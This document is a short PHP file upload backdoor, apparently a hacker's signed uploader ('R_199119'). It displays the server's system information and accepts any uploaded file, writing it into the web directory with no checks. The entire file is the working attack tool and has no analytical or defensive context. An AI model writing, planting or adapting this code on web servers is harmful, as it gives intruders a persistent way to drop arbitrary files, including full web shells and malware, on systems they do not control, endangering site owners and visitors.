<?php
echo "<b>R_199119 :)</b>";
echo "<br>".php_uname()."<br>";
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='nastar'><input type='submit' name='upload' value='upload'>
</form>";
if($_POST['upload']) {
	if(@copy($_FILES['nastar']['tmp_name'], $_FILES['nastar']['name'])) {
	echo "ok";
	} else {
	echo "ggl";
	}
}
?>
